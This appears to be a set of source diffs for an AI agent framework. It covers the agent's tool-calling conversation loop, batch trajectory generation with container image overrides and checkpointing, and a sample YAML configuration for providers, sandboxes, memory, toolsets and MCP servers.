errors.append("Tool call missing 'name' string")
continue
if not isinstance(args, dict):
errors.append("Tool call 'arguments' must be an object")
continue
calls.append((name, args))
return calls, errors
async def run_conversation_async(
self,
user_message: str,
system_message: Optional[str] = None,
conversation_history: Optional[List[Dict[str, Any]]] = None,
task_id: Optional[str] = None,
) -> Dict[str, Any]:
import uuid
effective_task_id = task_id or str(uuid.uuid4())
messages: List[Dict[str, Any]] = conversation_history.copy() if conversation_history else []
messages.append({"role": "user", "content": user_message})
active_system_prompt = self._build_system_prompt(system_message)
api_call_count = 0
final_response: Optional[str] = None
managed_state: Optional[Dict[str, Any]] = None
completed = False
try:
async with self._managed() as managed:
while api_call_count < self.max_iterations:
api_call_count += 1
api_messages = messages.copy()
if active_system_prompt:
api_messages = [{"role": "system", "content": active_system_prompt}] + api_messages
chat_kwargs: Dict[str, Any] = {"messages": api_messages, "n": 1}
if self.max_tokens is not None:
chat_kwargs["max_tokens"] = self.max_tokens
if self.temperature is not None:
chat_kwargs["temperature"] = self.temperature
# Prefer OpenAI tool calling when supported by the backend:
# - Many providers normalize Hermes-style <tool_call> tags into tool_calls when `tools` is provided.
# - ManagedServer (atroposlib) does prompt->completion conversion and does not support `tools`.
# Only pass `tools` when we're calling an OpenAI-compatible chat endpoint directly.
tool_schemas = self.tools if self.tools else None
managed_cls = type(managed).__name__
if tool_schemas and managed_cls != "ManagedServer":
chat_kwargs["tools"] = tool_schemas
if os.getenv("HERMES_DEBUG_ATROPOS_REQUEST") == "1":
meta = {
"managed_type": managed_cls,
"model": getattr(getattr(managed, "config", None), "model_name", self.model),
"base_url": getattr(getattr(managed, "config", None), "base_url", None),
"kwargs": chat_kwargs,
}
# Avoid dumping megabytes of data accidentally.
# (Messages can be large; this is still "full" but bounded.)
print("\n=== HERMES_DEBUG_ATROPOS_REQUEST ===", flush=True)
print(json.dumps(meta, ensure_ascii=False, indent=2)[:200_000], flush=True)
response = await managed.chat_completion(**chat_kwargs)
if os.getenv("HERMES_DEBUG_ATROPOS_RESPONSE") == "1":
try:
dumped = response.model_dump() # openai pydantic model
except Exception:
dumped = getattr(response, "__dict__", {"repr": repr(response)})
print("\n=== HERMES_DEBUG_ATROPOS_RESPONSE: ChatCompletion (raw) ===", flush=True)
print(json.dumps(dumped, ensure_ascii=False, indent=2), flush=True)
if hasattr(managed, "get_state"):
managed_state = managed.get_state()
msg = response.choices[0].message
assistant_content = (msg.content or "")
msg_reasoning = getattr(msg, "reasoning", None)
# Use tool_calls if the backend provides them (preferred).
structured_tool_calls = getattr(msg, "tool_calls", None)
# If the backend emits content="" but includes useful text in reasoning,
# use it for parsing *only if needed* (e.g. tool tags).
if assistant_content == "" and isinstance(msg_reasoning, str) and msg_reasoning:
if os.getenv("HERMES_DEBUG_ATROPOS_RESPONSE") == "1":
print("\n=== HERMES_DEBUG_ATROPOS_RESPONSE: message.reasoning present (content empty) ===", flush=True)
print(msg_reasoning, flush=True)
assistant_msg: Dict[str, Any] = {"role": "assistant", "content": assistant_content}
if structured_tool_calls:
# Preserve tool_calls so the next request is consistent with OpenAI protocol.
try:
assistant_msg["tool_calls"] = [
{
"id": tc.id,
"type": tc.type,
"function": {"name": tc.function.name, "arguments": tc.function.arguments},
}
for tc in structured_tool_calls
]
except Exception:
# Best-effort; keep conversation moving.
pass
messages.append(assistant_msg)
# Mode A: OpenAI tool calling (preferred when supported)
if structured_tool_calls:
for tc in structured_tool_calls:
tool_start = time.time()
try:
tool_args = json.loads(tc.function.arguments or "{}")
except Exception:
tool_args = {}
tool_result = handle_function_call(tc.function.name, tool_args, effective_task_id)
tool_duration = time.time() - tool_start
# Keep the raw tool result as tool content (OpenAI protocol expects role=tool).
messages.append(
{
"role": "tool",
"tool_call_id": tc.id,
"content": tool_result,
}
)
if self.tool_delay and self.tool_delay > 0:
await asyncio.sleep(self.tool_delay)
# Continue loop after tool execution.
continue
# Mode B: Hermes XML tool tags in assistant text (fallback).
parse_source = assistant_content or (msg_reasoning or "")
tool_calls, parse_errors = self._parse_tool_calls(parse_source)
if parse_errors and not tool_calls:
# Ask the model to retry with valid tool JSON.
err_text = "; ".join(parse_errors[:3])
messages.append(
{
"role": "user",
"content": (
f"<tool_response>{json.dumps({'error': err_text}, ensure_ascii=False)}</tool_response>\n"
"The previous <tool_call> blocks were invalid. Please output valid JSON inside <tool_call>."
),
}
)
continue
if not tool_calls:
# No tool calls: treat as final answer.
final_response = (assistant_content or "").strip()
completed = True
break
tool_responses: List[str] = []
for tool_name, tool_args in tool_calls:
tool_start = time.time()
tool_result = handle_function_call(tool_name, tool_args, effective_task_id)
tool_duration = time.time() - tool_start
try:
parsed = json.loads(tool_result)
payload: Any = parsed
except Exception:
payload = tool_result
tool_payload = {
"name": tool_name,
"duration_s": round(tool_duration, 3),
"result": payload,
}
tool_responses.append(
f"<tool_response>{json.dumps(tool_payload, ensure_ascii=False)}</tool_response>"
)
if self.tool_delay and self.tool_delay > 0:
await asyncio.sleep(self.tool_delay)
messages.append({"role": "user", "content": "\n".join(tool_responses)})
if final_response is None:
final_response = "I've reached the maximum number of iterations."
finally:
try:
cleanup_vm(effective_task_id)
except Exception:
pass
# Save trajectory using Hermes formatting (optional).
self._save_trajectory(messages, user_message, completed=completed)
return {
"final_response": final_response,
"messages": messages,
"api_calls": api_call_count,
"completed": completed,
"managed_state": managed_state,
"system_prompt": active_system_prompt,
"task_id": effective_task_id,
}
def run_conversation(self, *args: Any, **kwargs: Any) -> Dict[str, Any]:
"""
Sync wrapper for convenience.
If called from within a running event loop (e.g. prompt_toolkit), this
runs the async conversation in a dedicated thread to avoid nested loops.
"""
try:
asyncio.get_running_loop()
except RuntimeError:
return asyncio.run(self.run_conversation_async(*args, **kwargs))
import queue
import threading
out: "queue.Queue[object]" = queue.Queue(maxsize=1)
def runner() -> None:
try:
out.put(asyncio.run(self.run_conversation_async(*args, **kwargs)))
except BaseException as exc: # noqa: BLE001
out.put(exc)
thread = threading.Thread(target=runner, daemon=True)
thread.start()
result = out.get()
if isinstance(result, BaseException):
raise result
return result # type: ignore[return-value]

View File

@@ -27,16 +27,14 @@ import time
from pathlib import Path
from typing import List, Dict, Any, Optional, Tuple
from datetime import datetime
from multiprocessing import Pool, Manager, Lock
from multiprocessing import Pool, Lock
import traceback
from rich.progress import Progress, SpinnerColumn, BarColumn, TextColumn, TimeRemainingColumn, MofNCompleteColumn
from rich.console import Console
import fire
from run_agent import AIAgent
from toolset_distributions import (
get_distribution,
list_distributions,
sample_toolsets_from_distribution,
validate_distribution
@@ -173,7 +171,7 @@ def _extract_tool_stats(messages: List[Dict[str, Any]]) -> Dict[str, Dict[str, i
if content_json.get("success") is False:
is_success = False
except:
except (json.JSONDecodeError, ValueError, TypeError):
# If not JSON, check if content is empty or explicitly states an error
# Note: We avoid simple substring matching to prevent false positives
if not content:
@@ -240,7 +238,7 @@ def _process_single_prompt(
Args:
prompt_index (int): Index of prompt in dataset
prompt_data (Dict): Prompt data containing 'prompt' field
prompt_data (Dict): Prompt data containing 'prompt' field and optional 'image' field
batch_num (int): Batch number
config (Dict): Configuration dict with agent parameters
@@ -248,6 +246,58 @@ def _process_single_prompt(
Dict: Result containing trajectory, stats, and metadata
"""
prompt = prompt_data["prompt"]
task_id = f"task_{prompt_index}"
# Per-prompt container image override: if the dataset row has an 'image' field,
# register it for this task's sandbox. Works with Docker, Modal, Singularity, and Daytona.
container_image = prompt_data.get("image") or prompt_data.get("docker_image")
if container_image:
# Verify the image is accessible before spending tokens on the agent loop.
# For Docker: check local cache, then try pulling.
# For Modal: skip local check (Modal pulls server-side).
env_type = os.getenv("TERMINAL_ENV", "local")
if env_type == "docker":
import subprocess as _sp
try:
probe = _sp.run(
["docker", "image", "inspect", container_image],
capture_output=True, timeout=10,
)
if probe.returncode != 0:
if config.get("verbose"):
print(f" Prompt {prompt_index}: Pulling docker image {container_image}...", flush=True)
pull = _sp.run(
["docker", "pull", container_image],
capture_output=True, text=True, timeout=600,
)
if pull.returncode != 0:
return {
"success": False,
"prompt_index": prompt_index,
"error": f"Docker image not available: {container_image}\n{pull.stderr[:500]}",
"trajectory": None,
"tool_stats": {},
"toolsets_used": [],
"metadata": {"batch_num": batch_num, "timestamp": datetime.now().isoformat()},
}
except FileNotFoundError:
pass # Docker CLI not installed — skip check (e.g., Modal backend)
except Exception as img_err:
if config.get("verbose"):
print(f" Prompt {prompt_index}: Docker image check failed: {img_err}", flush=True)
from tools.terminal_tool import register_task_env_overrides
overrides = {
"docker_image": container_image,
"modal_image": container_image,
"singularity_image": f"docker://{container_image}",
"daytona_image": container_image,
}
if prompt_data.get("cwd"):
overrides["cwd"] = prompt_data["cwd"]
register_task_env_overrides(task_id, overrides)
if config.get("verbose"):
print(f" Prompt {prompt_index}: Using container image {container_image}")
try:
# Sample toolsets from distribution for this prompt
@@ -276,10 +326,12 @@ def _process_single_prompt(
max_tokens=config.get("max_tokens"),
reasoning_config=config.get("reasoning_config"),
prefill_messages=config.get("prefill_messages"),
skip_context_files=True, # Don't pollute trajectories with SOUL.md/AGENTS.md
skip_memory=True, # Don't use persistent memory in batch runs
)
# Run the agent with task_id to ensure each task gets its own isolated VM
result = agent.run_conversation(prompt, task_id=f"task_{prompt_index}")
result = agent.run_conversation(prompt, task_id=task_id)
# Extract tool usage statistics
tool_stats = _extract_tool_stats(result["messages"])
@@ -648,14 +700,13 @@ class BatchRunner:
lock (Lock): Optional lock for thread-safe access
"""
checkpoint_data["last_updated"] = datetime.now().isoformat()
from utils import atomic_json_write
if lock:
with lock:
with open(self.checkpoint_file, 'w', encoding='utf-8') as f:
json.dump(checkpoint_data, f, indent=2, ensure_ascii=False)
atomic_json_write(self.checkpoint_file, checkpoint_data)
else:
with open(self.checkpoint_file, 'w', encoding='utf-8') as f:
json.dump(checkpoint_data, f, indent=2, ensure_ascii=False)
atomic_json_write(self.checkpoint_file, checkpoint_data)
def _scan_completed_prompts_by_content(self) -> set:
"""
@@ -780,13 +831,15 @@ class BatchRunner:
print(f" New batches created: {len(batches_to_process)}")
print("=" * 70 + "\n")
# Initialize checkpoint data (needed for saving at the end)
checkpoint_data = {
"run_name": self.run_name,
"completed_prompts": [],
"batch_stats": {},
"last_updated": None
}
# Load existing checkpoint (so resume doesn't clobber prior progress)
checkpoint_data = self._load_checkpoint()
if checkpoint_data.get("run_name") != self.run_name:
checkpoint_data = {
"run_name": self.run_name,
"completed_prompts": [],
"batch_stats": {},
"last_updated": None
}
# Prepare configuration for workers
config = {
@@ -808,7 +861,7 @@ class BatchRunner:
}
# For backward compatibility, still track by index (but this is secondary to content matching)
completed_prompts_set = set()
completed_prompts_set = set(checkpoint_data.get("completed_prompts", []))
# Aggregate statistics across all batches
total_tool_stats = {}
@@ -817,6 +870,9 @@ class BatchRunner:
print(f"\n🔧 Initializing {self.num_workers} worker processes...")
# Checkpoint writes happen in the parent process; keep a lock for safety.
checkpoint_lock = Lock()
# Process batches in parallel
with Pool(processes=self.num_workers) as pool:
# Create tasks for each batch
@@ -862,6 +918,28 @@ class BatchRunner:
for result in pool.imap_unordered(_process_batch_worker, tasks):
results.append(result)
progress.update(task, advance=1)
# Incremental checkpoint update (so resume works after crash)
try:
batch_num = result.get('batch_num')
completed = result.get('completed_prompts', []) or []
completed_prompts_set.update(completed)
if isinstance(batch_num, int):
checkpoint_data.setdefault('batch_stats', {})[str(batch_num)] = {
'processed': result.get('processed', 0),
'skipped': result.get('skipped', 0),
'discarded_no_reasoning': result.get('discarded_no_reasoning', 0),
}
checkpoint_data['completed_prompts'] = sorted(completed_prompts_set)
self._save_checkpoint(checkpoint_data, lock=checkpoint_lock)
except Exception as ckpt_err:
# Don't fail the run if checkpoint write fails
print(f"⚠️ Warning: Failed to save incremental checkpoint: {ckpt_err}")
except Exception as e:
logger.error("Batch worker failed: %s", e, exc_info=True)
raise
finally:
root_logger.setLevel(original_level)
@@ -890,9 +968,12 @@ class BatchRunner:
for key in total_reasoning_stats:
total_reasoning_stats[key] += batch_result.get("reasoning_stats", {}).get(key, 0)
# Save final checkpoint
checkpoint_data["completed_prompts"] = all_completed_prompts
self._save_checkpoint(checkpoint_data)
# Save final checkpoint (best-effort; incremental writes already happened)
try:
checkpoint_data["completed_prompts"] = all_completed_prompts
self._save_checkpoint(checkpoint_data, lock=checkpoint_lock)
except Exception as ckpt_err:
print(f"⚠️ Warning: Failed to save final checkpoint: {ckpt_err}")
# Calculate success rates
for tool_name in total_tool_stats:
@@ -1031,7 +1112,7 @@ def main(
batch_size: int = None,
run_name: str = None,
distribution: str = "default",
model: str = "anthropic/claude-sonnet-4-20250514",
model: str = "anthropic/claude-sonnet-4.6",
api_key: str = None,
base_url: str = "https://openrouter.ai/api/v1",
max_turns: int = 10,
@@ -1074,7 +1155,7 @@ def main(
providers_order (str): Comma-separated list of OpenRouter providers to try in order (e.g. "anthropic,openai,google")
provider_sort (str): Sort providers by "price", "throughput", or "latency" (OpenRouter only)
max_tokens (int): Maximum tokens for model responses (optional, uses model default if not set)
reasoning_effort (str): OpenRouter reasoning effort level: "xhigh", "high", "medium", "low", "minimal", "none" (default: "xhigh")
reasoning_effort (str): OpenRouter reasoning effort level: "xhigh", "high", "medium", "low", "minimal", "none" (default: "medium")
reasoning_disabled (bool): Completely disable reasoning/thinking tokens (default: False)
prefill_messages_file (str): Path to JSON file containing prefill messages (list of {role, content} dicts)
max_samples (int): Only process the first N samples from the dataset (optional, processes all if not set)
@@ -1135,7 +1216,7 @@ def main(
providers_order_list = [p.strip() for p in providers_order.split(",")] if providers_order else None
# Build reasoning_config from CLI flags
# --reasoning_disabled takes priority, then --reasoning_effort, then default (xhigh)
# --reasoning_disabled takes priority, then --reasoning_effort, then default (medium)
reasoning_config = None
if reasoning_disabled:
# Completely disable reasoning/thinking tokens

File diff suppressed because it is too large Load Diff

View File

@@ -9,10 +9,57 @@ model:
# Default model to use (can be overridden with --model flag)
default: "anthropic/claude-opus-4.6"
# Inference provider selection:
# "auto" - Use Nous Portal if logged in, otherwise OpenRouter/env vars (default)
# "openrouter" - Always use OpenRouter API key from OPENROUTER_API_KEY
# "nous" - Always use Nous Portal (requires: hermes login)
# "zai" - Use z.ai / ZhipuAI GLM models (requires: GLM_API_KEY)
# "kimi-coding"- Use Kimi / Moonshot AI models (requires: KIMI_API_KEY)
# "minimax" - Use MiniMax global endpoint (requires: MINIMAX_API_KEY)
# "minimax-cn" - Use MiniMax China endpoint (requires: MINIMAX_CN_API_KEY)
# Can also be overridden with --provider flag or HERMES_INFERENCE_PROVIDER env var.
provider: "auto"
# API configuration (falls back to OPENROUTER_API_KEY env var)
# api_key: "your-key-here" # Uncomment to set here instead of .env
base_url: "https://openrouter.ai/api/v1"
# =============================================================================
# OpenRouter Provider Routing (only applies when using OpenRouter)
# =============================================================================
# Control how requests are routed across providers on OpenRouter.
# See: https://openrouter.ai/docs/guides/routing/provider-selection
#
# provider_routing:
# # Sort strategy: "price" (default), "throughput", or "latency"
# # Append :nitro to model name for a shortcut to throughput sorting.
# sort: "throughput"
#
# # Only allow these providers (provider slugs from OpenRouter)
# # only: ["anthropic", "google"]
#
# # Skip these providers entirely
# # ignore: ["deepinfra", "fireworks"]
#
# # Try providers in this order (overrides default load balancing)
# # order: ["anthropic", "google", "together"]
#
# # Require providers to support all parameters in your request
# # require_parameters: true
#
# # Data policy: "allow" (default) or "deny" to exclude providers that may store data
# # data_collection: "deny"
# =============================================================================
# Git Worktree Isolation
# =============================================================================
# When enabled, each CLI session creates an isolated git worktree so multiple
# agents can work on the same repo concurrently without file collisions.
# Equivalent to always passing --worktree / -w on the command line.
#
# worktree: true # Always create a worktree when in a git repo
# worktree: false # Default — only create when -w flag is passed
# =============================================================================
# Terminal Tool Configuration
# =============================================================================
@@ -27,8 +74,8 @@ model:
# - CLI (`hermes` command): Uses "." (current directory where you run hermes)
# - Messaging (Telegram/Discord): Uses MESSAGING_CWD from .env (default: home)
terminal:
env_type: "local"
cwd: "." # CLI working directory - "." means current directory
backend: "local"
cwd: "." # For local backend: "." = current directory. Ignored for remote backends.
timeout: 180
lifetime_seconds: 300
# sudo_password: "" # Enable sudo commands (pipes via sudo -S) - SECURITY WARNING: plaintext!
@@ -39,8 +86,8 @@ terminal:
# Great for: keeping agent isolated from its own code, using powerful remote hardware
# -----------------------------------------------------------------------------
# terminal:
# env_type: "ssh"
# cwd: "/home/myuser/project"
# backend: "ssh"
# cwd: "/home/myuser/project" # Path on the REMOTE server
# timeout: 180
# lifetime_seconds: 300
# ssh_host: "my-server.example.com"
@@ -54,8 +101,8 @@ terminal:
# Great for: reproducible environments, testing, isolation
# -----------------------------------------------------------------------------
# terminal:
# env_type: "docker"
# cwd: "/workspace"
# backend: "docker"
# cwd: "/workspace" # Path INSIDE the container (default: /)
# timeout: 180
# lifetime_seconds: 300
# docker_image: "nikolaik/python-nodejs:python3.11-nodejs20"
@@ -66,8 +113,8 @@ terminal:
# Great for: HPC clusters, shared compute environments
# -----------------------------------------------------------------------------
# terminal:
# env_type: "singularity"
# cwd: "/workspace"
# backend: "singularity"
# cwd: "/workspace" # Path INSIDE the container (default: /root)
# timeout: 180
# lifetime_seconds: 300
# singularity_image: "docker://nikolaik/python-nodejs:python3.11-nodejs20"
@@ -78,12 +125,35 @@ terminal:
# Great for: GPU access, scalable compute, serverless execution
# -----------------------------------------------------------------------------
# terminal:
# env_type: "modal"
# cwd: "/workspace"
# backend: "modal"
# cwd: "/workspace" # Path INSIDE the sandbox (default: /root)
# timeout: 180
# lifetime_seconds: 300
# modal_image: "nikolaik/python-nodejs:python3.11-nodejs20"
# -----------------------------------------------------------------------------
# OPTION 6: Daytona cloud execution
# Commands run in Daytona cloud sandboxes
# Great for: Cloud dev environments, persistent workspaces, team collaboration
# Requires: pip install daytona, DAYTONA_API_KEY env var
# -----------------------------------------------------------------------------
# terminal:
# backend: "daytona"
# cwd: "~"
# timeout: 180
# lifetime_seconds: 300
# daytona_image: "nikolaik/python-nodejs:python3.11-nodejs20"
# container_disk: 10240 # Daytona max is 10GB per sandbox
#
# --- Container resource limits (docker, singularity, modal, daytona -- ignored for local/ssh) ---
# These settings apply to all container backends. They control the resources
# allocated to the sandbox and whether its filesystem persists across sessions.
container_cpu: 1 # CPU cores
container_memory: 5120 # Memory in MB (5120 = 5GB)
container_disk: 51200 # Disk in MB (51200 = 50GB)
container_persistent: true # Persist filesystem across sessions (false = ephemeral)
# -----------------------------------------------------------------------------
# SUDO SUPPORT (works with ALL backends above)
# -----------------------------------------------------------------------------
@@ -139,8 +209,126 @@ compression:
threshold: 0.85
# Model to use for generating summaries (fast/cheap recommended)
# This model compresses the middle turns into a concise summary
# This model compresses the middle turns into a concise summary.
# IMPORTANT: it receives the full middle section of the conversation, so it
# MUST support a context length at least as large as your main model's.
summary_model: "google/gemini-3-flash-preview"
# Provider for the summary model (default: "auto")
# Options: "auto", "openrouter", "nous", "main"
# summary_provider: "auto"
# =============================================================================
# Auxiliary Models (Advanced — Experimental)
# =============================================================================
# Hermes uses lightweight "auxiliary" models for side tasks: image analysis,
# browser screenshot analysis, web page summarization, and context compression.
#
# By default these use Gemini Flash via OpenRouter or Nous Portal and are
# auto-detected from your credentials. You do NOT need to change anything
# here for normal usage.
#
# WARNING: Overriding these with providers other than OpenRouter or Nous Portal
# is EXPERIMENTAL and may not work. Not all models/providers support vision,
# produce usable summaries, or accept the same API format. Change at your own
# risk — if things break, reset to "auto" / empty values.
#
# Each task has its own provider + model pair so you can mix providers.
# For example: OpenRouter for vision (needs multimodal), but your main
# local endpoint for compression (just needs text).
#
# Provider options:
# "auto" - Best available: OpenRouter → Nous Portal → main endpoint (default)
# "openrouter" - Force OpenRouter (requires OPENROUTER_API_KEY)
# "nous" - Force Nous Portal (requires: hermes login)
# "codex" - Force Codex OAuth (requires: hermes model → Codex).
# Uses gpt-5.3-codex which supports vision.
# "main" - Use your custom endpoint (OPENAI_BASE_URL + OPENAI_API_KEY).
# Works with OpenAI API, local models, or any OpenAI-compatible
# endpoint. Also falls back to Codex OAuth and API-key providers.
#
# Model: leave empty to use the provider's default. When empty, OpenRouter
# uses "google/gemini-3-flash-preview" and Nous uses "gemini-3-flash".
# Other providers pick a sensible default automatically.
#
# auxiliary:
# # Image analysis: vision_analyze tool + browser screenshots
# vision:
# provider: "auto"
# model: "" # e.g. "google/gemini-2.5-flash", "openai/gpt-4o"
#
# # Web page scraping / summarization + browser page text extraction
# web_extract:
# provider: "auto"
# model: ""
# =============================================================================
# Persistent Memory
# =============================================================================
# Bounded curated memory injected into the system prompt every session.
# Two stores: MEMORY.md (agent's notes) and USER.md (user profile).
# Character limits keep the memory small and focused. The agent manages
# pruning -- when at the limit, it must consolidate or replace entries.
# Disabled by default in batch_runner and RL environments.
#
memory:
# Agent's personal notes: environment facts, conventions, things learned
memory_enabled: true
# User profile: preferences, communication style, expectations
user_profile_enabled: true
# Character limits (~2.75 chars per token, model-independent)
memory_char_limit: 2200 # ~800 tokens
user_char_limit: 1375 # ~500 tokens
# Periodic memory nudge: remind the agent to consider saving memories
# every N user turns. Set to 0 to disable. Only active when memory is enabled.
nudge_interval: 10 # Nudge every 10 user turns (0 = disabled)
# Memory flush: give the agent one turn to save memories before context is
# lost (compression, /new, /reset, exit). Set to 0 to disable.
# For exit/reset, only fires if the session had at least this many user turns.
flush_min_turns: 6 # Min user turns to trigger flush on exit/reset (0 = disabled)
# =============================================================================
# Session Reset Policy (Messaging Platforms)
# =============================================================================
# Controls when messaging sessions (Telegram, Discord, WhatsApp, Slack) are
# automatically cleared. Without resets, conversation context grows indefinitely
# which increases API costs with every message.
#
# When a reset triggers, the agent first saves important information to its
# persistent memory — but the conversation context is wiped. The agent starts
# fresh but retains learned facts via its memory system.
#
# Users can always manually reset with /reset or /new in chat.
#
# Modes:
# "both" - Reset on EITHER inactivity timeout or daily boundary (recommended)
# "idle" - Reset only after N minutes of inactivity
# "daily" - Reset only at a fixed hour each day
# "none" - Never auto-reset; context lives until /reset or compression kicks in
#
# When a reset triggers, the agent gets one turn to save important memories and
# skills before the context is wiped. Persistent memory carries across sessions.
#
session_reset:
mode: both # "both", "idle", "daily", or "none"
idle_minutes: 1440 # Inactivity timeout in minutes (default: 1440 = 24 hours)
at_hour: 4 # Daily reset hour, 0-23 local time (default: 4 AM)
# =============================================================================
# Skills Configuration
# =============================================================================
# Skills are reusable procedures the agent can load and follow. The agent can
# also create new skills after completing complex tasks.
#
skills:
# Nudge the agent to create skills after complex tasks.
# Every N tool-calling iterations, remind the model to consider saving a skill.
# Set to 0 to disable.
creation_nudge_interval: 15
# =============================================================================
# Agent Behavior
@@ -154,9 +342,10 @@ agent:
# Enable verbose logging
verbose: false
# Custom system prompt (personality, instructions, etc.)
# Leave empty or remove to use default agent behavior
system_prompt: ""
# Reasoning effort level (OpenRouter and Nous Portal)
# Controls how much "thinking" the model does before responding.
# Options: "xhigh" (max), "high", "medium", "low", "minimal", "none" (disable)
reasoning_effort: "medium"
# Predefined personalities (use with /personality command)
personalities:
@@ -181,19 +370,111 @@ agent:
# Control which tools the agent has access to.
# Use "all" to enable everything, or specify individual toolsets.
# Available toolsets:
# =============================================================================
# Platform Toolsets (per-platform tool configuration)
# =============================================================================
# Override which toolsets are available on each platform.
# If a platform isn't listed here, its built-in default is used.
#
# You can use EITHER:
# - A preset like "hermes-cli" or "hermes-telegram" (curated tool set)
# - A list of individual toolsets to compose your own (see list below)
#
# Supported platform keys: cli, telegram, discord, whatsapp, slack
#
# Examples:
#
# # Use presets (same as defaults):
# platform_toolsets:
# cli: [hermes-cli]
# telegram: [hermes-telegram]
#
# # Custom: give Telegram only web + terminal + file + planning:
# platform_toolsets:
# telegram: [web, terminal, file, todo]
#
# # Custom: CLI without browser or image gen:
# platform_toolsets:
# cli: [web, terminal, file, skills, todo, tts, cronjob]
#
# # Restrictive: Discord gets read-only tools only:
# platform_toolsets:
# discord: [web, vision, skills, todo]
#
# If not set, defaults are:
# cli: hermes-cli (everything + cronjob management)
# telegram: hermes-telegram (terminal, file, web, vision, image, tts, browser, skills, todo, cronjob, messaging)
# discord: hermes-discord (same as telegram)
# whatsapp: hermes-whatsapp (same as telegram)
# slack: hermes-slack (same as telegram)
# signal: hermes-signal (same as telegram)
# homeassistant: hermes-homeassistant (same as telegram)
#
platform_toolsets:
cli: [hermes-cli]
telegram: [hermes-telegram]
discord: [hermes-discord]
whatsapp: [hermes-whatsapp]
slack: [hermes-slack]
signal: [hermes-signal]
homeassistant: [hermes-homeassistant]
# ─────────────────────────────────────────────────────────────────────────────
# Available toolsets (use these names in platform_toolsets or the toolsets list)
#
# Run `hermes chat --list-toolsets` to see all toolsets and their tools.
# Run `hermes chat --list-tools` to see every individual tool with descriptions.
# ─────────────────────────────────────────────────────────────────────────────
#
# INDIVIDUAL TOOLSETS (compose your own):
# web - web_search, web_extract
# search - web_search only (no scraping)
# terminal - terminal, process
# file - read_file, write_file, patch, search
# browser - browser_navigate, browser_snapshot, browser_click, browser_type,
# browser_scroll, browser_back, browser_press, browser_close,
# browser_get_images, browser_vision (requires BROWSERBASE_API_KEY)
# vision - vision_analyze (requires OPENROUTER_API_KEY)
# image_gen - image_generate (requires FAL_KEY)
# skills - skills_list, skill_view
# skills_hub - skill_hub (search/install/manage from online registries — user-driven only)
# moa - mixture_of_agents (requires OPENROUTER_API_KEY)
# todo - todo (in-memory task planning, no deps)
# tts - text_to_speech (Edge TTS free, or ELEVENLABS/OPENAI key)
# cronjob - schedule_cronjob, list_cronjobs, remove_cronjob
# rl - rl_list_environments, rl_start_training, etc. (requires TINKER_API_KEY)
#
# PRESETS (curated bundles):
# hermes-cli - All of the above except rl + send_message
# hermes-telegram - terminal, file, web, vision, image_gen, tts, browser,
# skills, todo, cronjob, send_message
# hermes-discord - Same as hermes-telegram
# hermes-whatsapp - Same as hermes-telegram
# hermes-slack - Same as hermes-telegram
#
# COMPOSITE:
# debugging - terminal + web + file
# safe - web + vision + moa (no terminal access)
# all - Everything available
#
# web - Web search and content extraction (web_search, web_extract)
# search - Web search only, no scraping (web_search)
# terminal - Command execution (terminal)
# terminal - Command execution and process management (terminal, process)
# file - File operations: read, write, patch, search
# browser - Full browser automation (navigate, click, type, screenshot, etc.)
# vision - Image analysis (vision_analyze)
# image_gen - Image generation with FLUX (image_generate)
# skills - Load skill documents (skills_categories, skills_list, skill_view)
# skills - Load skill documents (skills_list, skill_view)
# moa - Mixture of Agents reasoning (mixture_of_agents)
# todo - Task planning and tracking for multi-step work
# memory - Persistent memory across sessions (personal notes + user profile)
# session_search - Search and recall past conversations (FTS5 + Gemini Flash summarization)
# tts - Text-to-speech (Edge TTS free, ElevenLabs, OpenAI)
# cronjob - Schedule and manage automated tasks (CLI-only)
# rl - RL training tools (Tinker-Atropos)
#
# Composite toolsets:
# debugging - terminal + web (for troubleshooting)
# debugging - terminal + web + file (for troubleshooting)
# safe - web + vision + moa (no terminal access)
# -----------------------------------------------------------------------------
@@ -244,6 +525,74 @@ toolsets:
# toolsets:
# - safe
# =============================================================================
# MCP (Model Context Protocol) Servers
# =============================================================================
# Connect to external MCP servers to add tools from the MCP ecosystem.
# Each server's tools are automatically discovered and registered.
# See docs/mcp.md for full documentation.
#
# Stdio servers (spawn a subprocess):
# command: the executable to run
# args: command-line arguments
# env: environment variables (only these + safe defaults passed to subprocess)
#
# HTTP servers (connect to a URL):
# url: the MCP server endpoint
# headers: HTTP headers (e.g., for authentication)
#
# Optional per-server settings:
# timeout: tool call timeout in seconds (default: 120)
# connect_timeout: initial connection timeout (default: 60)
#
# mcp_servers:
# time:
# command: uvx
# args: ["mcp-server-time"]
# filesystem:
# command: npx
# args: ["-y", "@modelcontextprotocol/server-filesystem", "/home/user"]
# notion:
# url: https://mcp.notion.com/mcp
# github:
# command: npx
# args: ["-y", "@modelcontextprotocol/server-github"]
# env:
# GITHUB_PERSONAL_ACCESS_TOKEN: "ghp_..."
#
# Sampling (server-initiated LLM requests) — enabled by default.
# Per-server config under the 'sampling' key:
# analysis:
# command: npx
# args: ["-y", "analysis-server"]
# sampling:
# enabled: true # default: true
# model: "gemini-3-flash" # override model (optional)
# max_tokens_cap: 4096 # max tokens per request
# timeout: 30 # LLM call timeout (seconds)
# max_rpm: 10 # max requests per minute
# allowed_models: [] # model whitelist (empty = all)
# max_tool_rounds: 5 # tool loop limit (0 = disable)
# log_level: "info" # audit verbosity
# =============================================================================
# Voice Transcription (Speech-to-Text)
# =============================================================================
# Automatically transcribe voice messages on messaging platforms.
# Requires OPENAI_API_KEY in .env (uses OpenAI Whisper API directly).
stt:
enabled: true
model: "whisper-1" # whisper-1 (cheapest) | gpt-4o-mini-transcribe | gpt-4o-transcribe
# =============================================================================
# Response Pacing (Messaging Platforms)
# =============================================================================
# Add human-like delays between message chunks.
# human_delay:
# mode: "off" # "off" | "natural" | "custom"
# min_ms: 800 # Min delay (custom mode only)
# max_ms: 2500 # Max delay (custom mode only)
# =============================================================================
# Session Logging
# =============================================================================
@@ -259,9 +608,54 @@ toolsets:
# No configuration needed - logging is always enabled.
# To disable, you would need to modify the source code.
# =============================================================================
# Code Execution Sandbox (Programmatic Tool Calling)
# =============================================================================
# The execute_code tool runs Python scripts that call Hermes tools via RPC.
# Intermediate tool results stay out of the LLM's context window.
code_execution:
timeout: 300 # Max seconds per script before kill (default: 300 = 5 min)
max_tool_calls: 50 # Max RPC tool calls per execution (default: 50)
# =============================================================================
# Subagent Delegation
# =============================================================================
# The delegate_task tool spawns child agents with isolated context.
# Supports single tasks and batch mode (up to 3 parallel).
delegation:
max_iterations: 50 # Max tool-calling turns per child (default: 50)
default_toolsets: ["terminal", "file", "web"] # Default toolsets for subagents
# =============================================================================
# Honcho Integration (Cross-Session User Modeling)
